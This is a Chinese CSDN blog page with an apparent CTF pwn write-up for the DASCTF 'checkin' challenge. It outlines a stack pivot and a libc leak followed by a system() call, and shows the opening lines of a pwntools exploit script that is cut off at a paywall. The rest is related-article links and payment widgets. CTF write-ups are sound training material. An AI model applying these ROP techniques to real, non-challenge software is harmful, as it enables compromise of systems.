2022DASCTF X SU 三月春季挑战赛 checkin ROPgadget进阶使用

最新推荐文章于 2024-04-09 10:43:56 发布
最新推荐文章于 2024-04-09 10:43:56 发布
阅读量224 收藏 1
点赞数 1
分类专栏: pwn刷题wp 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_65147345/article/details/125835620
版权

#知识小点

ROPgadget --binary checkin --depth 20 | grep “指令”

–depth:选择搜寻的深度,默认是10,这样寻早其他指令十分全面和方便

#思路概要

  1. 栈迁移至bss段
  2. 泄露libc地址,将setvbuf改写成puts,将rdi内容改写成read_got,从而泄露libc
  3. 再次通过read函数执行system

#exp

from pwn import *

context.update(os='linux',arch='amd64',log_level='debug')
#c=remote(b'node4.buuoj.cn',25937)
c=process(b'./checkin')
elf=ELF(b'./checkin')
libc=ELF(b'/lib/x86_64-linux-gnu/libc.so.6')


puts=libc.sym['puts']
setvbuf=libc.sym['setvbuf']
setvbuf_got=elf.got['setvbuf']
setvbuf_plt=elf.plt['setvbuf']

pop_rbp_ret=
最低0.47元/天 解锁文章
Mauricio_Davis
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CheckIn:使用面部识别的便携式考勤管理
04-30
应用程序使用的功能相机全球定位系统促进美好事业应用程序使用的服务面部识别(通过OpenCV) Firebase(用于身份验证和持久数据存储) Amazon S3存储图像(如果已连接到网络,则为本地)项目进度进来的 使用Firebase...
checkin
03-18
【标题】:“checkin”项目解析 【描述】:这个名为“checkin”的项目是一个针对“深层链接”教程而创建的“酒店基本入住”Web应用程序。它的主要目标是提供一个平台,用户可以在这个平台上模拟酒店的入住流程,...
ROPgadget初识 ——— ret2syscall
qq_41696518的博客
07-01 1157
PWN
ROPR:一款功能强大的极速多线程ROPGadget查找工具
Karka_的博客
08-25 446
网络安全行业产业以来,随即新增加了几十个网络安全行业岗位︰网络安全专家、网络安全分析师、安全咨询师、网络安全工程师、安全架构师、安全运维工程师、渗透工程师、信息安全管理员、数据安全工程师、网络安全运营工程师、网络安全应急响应工程师、数据鉴定师、网络安全产品经理、网络安全服务工程师、网络安全培训师、网络安全审计员、威胁情报分析工程师、灾难恢复专业人员、实战攻防专业人员…网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。
ROPgadget使用
最新发布
Jingged的博客
04-09 582
需要注意的是,ROPgadget只是工具的一部分,成功的ROP攻击还需要深入理解目标二进制文件的结构和行为,以及攻击场景的具体细节。此外,随着软件安全性的提高和漏洞修复的不断进行,可用的gadgets可能会变得越来越少,因此在使用ROPgadget时,最好与其他工具和技术结合起来进行更全面的分析和利用开发。ROPgadget是一种基于代码复用技术的攻击工具,它可以帮助攻击者在二进制文件中找到可利用的代码片段(即ROP链中的gadgets),从而构建出有效的攻击载荷。是你想要分析的二进制文件的路径,
pwn练习1-ret2syscall(ROP-gadget)
m0_51756263的博客
10-07 1605
pwn练习1-ret2syscall(ROP-gadget)
探秘安全领域利器:`ROPgadget` - 反向工程与漏洞利用的新工具
gitblog_00017的博客
03-22 266
探秘安全领域利器:ROPgadget - 反向工程与漏洞利用的新工具 项目地址:https://gitcode.com/JonathanSalwan/ROPgadget 项目简介 在网络安全的世界里,ROPgadget 是一个非常实用的开源工具,由 Jonathan Salwan 开发并托管在 GitCode 上。它主要用于分析二进制文件,搜索可用于 Return-Oriented Program...
PWN入门之通用gadgets
weixin_44681716的博客
04-09 2765
实验目的 针对一些程序运行时的初始化函数(如加载libc.so的初始化函数),提取一些通用的gadgets,从而更利于我们继续ROP操作。 实验文件 这次实验的可执行文件文件通过我们自己编译一个程序产生,为了降低实验的难度,我们在进行编译的时候,关闭栈保护和数据执行保护(DEP)。 ...
library-model:使用对象为库建模。 Code Fellows JavaScript 编码挑战的问题 3
06-14
Code Fellows JavaScript 编码挑战的问题 3。 要开始运行npm install ,并执行 linting 任务运行grunt 。 运行node index.js来测试驱动库功能。 书籍由参数title 、 author和section 。 书架上放着书,书架由...
gadget-checkin:OmniUpdate的小工具,只需单击一下,即可检入一个站点或所有站点中的所有文件
04-28
小工具签入v1.0.1 该小工具将显示当前在每个站点中向用户签出的文件数,并为用户提供将其全部签回的选项。 版本v1.0.1 v1不再处于开发阶段,已经准备好迎接黄金时代!... 使用,当要求输入URL时,请使用
2022DASCTF X SU 三月春季挑战赛——REVERSE——easyre
qq_39763436的博客
03-31 761
2022DASCTF X SU 三月春季挑战赛 反序列化之签到题(easyre) 1、使用ExeinfoPe工具查看一下easyre.exe的详细信息,可以看到这个程序加了一个.aspack类型的壳; 2、使用Unpacker_ASPack工具进行自动脱壳,点击Dump,进行脱壳,并另存为; 3、使用较新版本的IDA打开,按F5进行反编译,找到main()函数后,对代码进行分析; 4、这个Destination就是我们需要的,而代码中只有这个函数sub_401771(Destination)用到
ROPgadget.zip
09-17
pip install ropgadget下载总是中断的可以试试,pwn必备工具ROPgadget,
使用ROPgadget快速寻找arm64 pwn的rop链之ret2csu
fjh1997的博客
01-28 1122
ROPgadget --binary ./pwn --only "ldp|ret" 看到最长的那个就是,我们得到rop链的入口0x400ff8接下来使用x30寄存器跳转的地址就是0x400ff8-0x20也就是0x400fd8这块.rop链第一阶段的目的是将0x400fd8填充到x30寄存器中。 也可以用rop ROPgadget --binary ./chall --only "ldr|mov|add|blr" 找到rop链链接的第二个片段入口 最后我们可以在x3中填充我们想要的地址,比如lib.
2022DASCTF X SU 三月春季挑战赛checkin(栈迁移,ret2dl)
m0_51251108的博客
09-26 376
ret2dl的复习
【ubuntu20pwn环境搭建】
weixin_51055545的博客
02-23 1500
一 镜像下载 这里我给大家总结几个比较常用的网站: ubuntu官网下载:https://cn.ubuntu.com/download/desktop 清华源:https://mirror.tuna.tsinghua.edu.cn/ubuntu-releases/20.04/ 阿里云开源镜像站:http://mirrors.aliyun.com/ubuntu-releases/20.04/ 推荐使用清华源或者阿里云 二 ubuntu20安装 镜像下载好后,打开虚拟机,点击文件,选择新建虚拟机: 选择自定义
ROPgadget 工具
weixin_30414635的博客
03-14 5720
Install $ pip install ropgadget $ ROPgadget Usage usage: ROPgadget.py [-h] [-v] [-c] [--binary <binary>] [--opcode <opcodes>] [--string <string>] [--memstr ...
ROPEmporium通关全解(六)
Yale的博客
12-24 246
前言 1.关于ROP ROP的全称为Return-oriented programming(返回导向编程),这是一种高级的内存攻击技术可以用来绕过现代操作系统的各种通用防御(比如内存不可执行和代码签名等) ROP是一种攻击技术,其中攻击者使用堆栈的控制来在现有程序代码中的子程序中的返回指令之前,立即间接地执行精心挑选的指令或机器指令组。 2. 本系列rop实战题目的背景 来自ROPEmporium...
ROPgadget - Gadgets finder and auto-roper
核桃树
01-21 4559
Description This tool lets you search your gadgets on your binaries to facilitate your ROP exploitation. ROPgadget supports ELF/PE/Mach-O format on x86, x64, ARM, PowerPC, SPARC and MIPS architectu
ItemRevision.checkin()怎么使用
08-11
使用ItemRevision.checkin()之前,首先需要使用版本控制系统创建一个项目。然后,在本地计算机上克隆或检出该项目的副本。接下来,对项目进行修改或添加新文件。 当完成对项目的修改后,可以使用ItemRevision....

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值